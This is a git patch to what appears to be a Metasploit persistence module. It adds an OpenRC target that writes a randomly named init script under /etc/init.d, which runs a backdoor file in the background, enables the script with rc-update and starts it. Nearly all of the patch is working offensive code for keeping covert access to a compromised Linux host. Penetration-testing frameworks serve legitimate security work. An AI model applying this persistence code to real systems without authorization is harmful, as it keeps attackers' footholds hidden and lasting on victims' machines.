From 811678a793d9896d8e67af8c8eaed9e5d3b7458d Mon Sep 17 00:00:00 2001
From: jvoisin <julien.voisin@dustri.org>
Date: Thu, 19 Sep 2024 22:26:43 +0200
Subject: [PATCH] Add openrc to exploits/linux/local/service_persistence.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
---
 .../linux/local/service_persistence.rb        | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)

diff --git a/modules/exploits/linux/local/service_persistence.rb b/modules/exploits/linux/local/service_persistence.rb
index 685d190dbf62..47efe825d723 100644
--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -59,6 +59,11 @@ def initialize(info = {})
                 'BACKDOOR_PATH' => '/usr/local/bin'
               }
             ],
+            ['openrc', 'DefaultOptions' =>
+              {
+                'BACKDOOR_PATH' => '/usr/local/bin'
+              }
+            ],
             ['systemd', 'DefaultOptions' =>
               {
                 'BACKDOOR_PATH' => '/usr/local/bin'
@@ -118,6 +123,8 @@ def exploit
       system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
     when 'Upstart'
       upstart(path, file, target.opts[:runlevel])
+    when 'openrc'
+      openrc(path, file)
     when 'systemd'
       systemd(path, file)
     when 'systemd user'
@@ -131,6 +138,10 @@ def exploit
         print_status('Utilizing Upstart')
         upstart(path, file, '2345')
       end
+      if service_system_exists?('openrc')
+        print_status('Utilizing openrc')
+        openrc(path, file)
+      end
       has_updatercd = service_system_exists?('update-rc.d')
       if has_updatercd || service_system_exists?('chkconfig') # centos 5
         print_status('Utilizing System_V')
@@ -397,4 +408,39 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
       cmd_exec("/etc/init.d/#{service_filename} start")
     end
   end
+
+  def openrc(backdoor_path, backdoor_file)
+    # https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts
+    # https://wiki.alpinelinux.org/wiki/OpenRC
+    # https://github.com/OpenRC/openrc/blob/master/service-script-guide.md
+    script = %{#!/sbin/openrc-run
+name=#{backdoor_file}
+command=/bin/sh
+command_args="#{backdoor_path}/#{backdoor_file}"
+pidfile="/run/${RC_SVCNAME}.pid"
+command_background="yes"
+}
+
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+    service_name = "/etc/init.d/#{service_filename}"
+    vprint_status("Writing service: #{service_name}")
+    begin
+      upload_and_chmodx(service_name, script)
+    rescue Rex::Post::Meterpreter::RequestError
+      print_error("Writing '#{service_name}' to the target and or changing the file permissions failed, ensure that directory exists?")
+    end
+
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions.')
+      return
+    end
+
+    if datastore['EnableService']
+      vprint_status('Enabling service')
+      cmd_exec("rc-update add '#{service_filename}'")
+    end
+
+    vprint_status('Starting service')
+    cmd_exec("'/etc/init.d/#{service_filename}' start")
+  end
 end